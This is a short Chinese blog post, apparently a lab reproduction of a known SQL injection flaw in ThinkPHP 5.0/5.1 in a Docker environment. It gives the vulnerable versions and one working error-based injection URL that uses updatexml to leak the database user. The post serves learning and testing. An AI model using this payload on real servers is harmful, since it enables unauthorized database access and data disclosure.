Thinkphp--in-sqlinjection

最新推荐文章于 2024-05-18 16:40:18 发布
最新推荐文章于 2024-05-18 16:40:18 发布
阅读量270 收藏 1
点赞数 11
文章标签: 服务器 linux 网络 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/138240119
版权

一、漏洞原理

在 Builder 类的 parseData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。

影响版本

5.0.13<=ThinkPHP<=5.0.15

5.1.0<=ThinkPHP<=5.1.5

在相应的文件夹位置打开终端后进行如下操作

二、漏洞复现

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

访问网页

http://192.168.83.136/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

这里用的是报错注入

小春学渗透
关注
  • 11
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp-bjyblog 开源博客系统 v1.1
10-11
闲暇之时使用thinkphp开发了一个个人博客用来整理技能知识; 如今博客的功能基本已经齐备;特开源以供各类猿们使用; 亦可以作为初学thinkphp的同学们的参考源代码; 此博客程序
thinkphp-in-sqlinjection漏洞复现
mlws1900的博客
07-08 617
docker搭建好环境 poc 输入爆出敏感信息 复现成功
Thinkphp in-sqlinjection复现
MDSEC的博客
08-19 64
在 Builder 类的 parseData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。Thinkphp in-sqlinjection复现。访问时加上下面的playload就可以获取敏感信息。
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1526
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
vulhub-thinkphp漏洞复现
qq_51922767的博客
09-14 2368
vulhub-thinkphp漏洞复现
ThinkPHP-PHP
06-20
ThinkPHP5.1对底层架构做了进一步的改进,减少依赖,其主要特性包括: 采用容器统一管理对象 支持Facade 注解路由支持 路由跨域请求支持 配置和路由目录独立 取消系统常量 助手函数增强 类库别名机制 增加条件查询 ...
thinkphp-bjyblog源代码
09-04
闲暇之时使用thinkphp开发了一个个人博客用来整理技能知识; 如今博客的功能基本已经齐备;特开源以供各类猿们免费使用; 亦可以作为初学thinkphp的同学们的参考源代码; 此博客程序前后台页面以及逻辑代码的都由我...
thinkphp-queue 笔记.md
05-09
thinkphp-queue 笔记.md
thinkphp-log-analyse:ThinkPHP日志分析
05-07
thinkphp-log-read 主界面 查询结果 自定义匹配 如果默认匹配账号密码不能满足,可以使用自定义匹配 注意:需要正则 自定义匹配结果
旧手机-基于Termux配置服务器(不用拿去换钢盆了)
jiashn123的专栏
05-14 397
Hi,大家好,我是抢老婆酸奶的小肥仔。大家用手机这么多年了,手上或多或少都有一两个被替换下来的旧手机,也不用拿去换啥钢盆了,使用Termux可以将旧手机改造成一个服务器。不多说,直接开干。
Java||Springboot读取本地目录的文件和文件结构,读取服务器文档目录数据供前端渲染的API实现
最新发布
RenGJ010617的博客
05-18 998
将服务器的工作目录渲染到前端页面上是经常遇到需要实现的需求,其中通过后端API读取本地目录,获取文件信息和文件系统层级数据是篇博客将要谈到的主要内容。
服务器数据恢复—KVM虚拟机被误删除怎么恢复数据?
beiya123的博客
05-17 177
9、针对存放程序代码的服务器中的节点和目录项丢失的情况,若节点或目录项有残留,可以尝试去补齐节点和目录项。如果文件的节点和目录项同时丢失,在这种情况下,根据节点和目录项之间相关联的特性则无法补齐节点和目录项。针对运行数据库的服务器中的数据库文件有丢失的情况,可以通过从自由空间中获取数据库页的方式去修补数据库文件。7、从自由空间中获取有效信息,尝试修补虚拟磁盘文件的节点,目录项以及虚拟磁盘文件中的数据库页等数据。4、完成索引的修复后解析服务器中残留的各级索引,从被误删除虚拟机所在的卷中提取虚拟磁盘文件。
银河麒麟服务器操作系统V10-SP2部署gitlab服务
weixin_43173670的博客
05-14 233
银河麒麟V10-sp2 安装 gitlab-ce
【问题实操】银河高级服务器操作系统实例分享,某信息系统服务器宕机处理
银河麒麟操作系统的博客
05-17 988
【问题实操】银河高级服务器操作系统实例分享,某信息系统服务器宕机处理。
服务器CPU满载100%怎么处理
m0_70754056的博客
05-17 177
CC是通过IP频繁的发起访问,可以通过命令或在查看日志查看到一些IP,就可以在IIS中设置屏蔽该IP对Web站点的访问,从而缓解CC攻击的压力。随着网络信息化的发展,服务器给企业服务商们带来非常多的便利,但与此同时在服务器的管理和维护上也令众多服务商们头疼不已,尤其当服务器在长时间的运行状态上,卡顿是最常见的问题,CPU满载是卡顿最常见的原因之一,那么遇到服务器CPU满载100%怎么办?2、程序占用导致的CPU满载,可以升级更高的硬件配置来解决,或者也是可以另购一台机器,将业务分摊到两台机器上,进行使用。
【MySQL精通之路】MySQL 8.0中添加、弃用或删除的服务器和状态变量及选项
Anakki的博客
05-16 314
欢迎大家关注专栏或者关注收藏我1.Mysql精通之路专栏: http://t.csdnimg.cn/4Rqp72.大家可以从这篇博客开始读,他是所有博客的根节点:【MySQL精通之路】详读MySQL8.0官方文档-CSDN博客MySQL 8.0中添加了以下系统变量、状态变量和服务器选项。 MySQL 8.0中删除了以下系统变量、状态变量和选项。
Vue如何打包上传至服务器?及其步骤。打包后刷新页面404怎么解决?
qingdouxiaohua的博客
05-17 122
打开你的Vue项目所在的文件夹,使用VSCode或其他你喜欢的编辑器打开。 在VSCode的终端中,输入npm run build(假设你的package.json文件中已经配置好了这个命令)。这个命令会启动Vue的打包过程,将你的项目打包成一个可以在服务器上运行的静态文件。 打包完成后,你会在项目根目录下看到一个名为dist的文件夹,这个文件夹中就是打包后的静态文件。
【问题实操】银河高级服务器操作系统实例分享,网卡drop问题分析
银河麒麟操作系统的博客
05-14 820
【问题实操】银河高级服务器操作系统实例分享,网卡drop问题分析.
thinkphp-errors漏洞
04-08
thinkphp-errors漏洞是指在使用ThinkPHP框架时存在的一种安全漏洞。该漏洞的主要原因是在错误处理机制中,未对异常信息进行适当的过滤和处理,导致攻击者可以通过构造恶意请求,获取敏感信息或执行任意代码。 具体...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值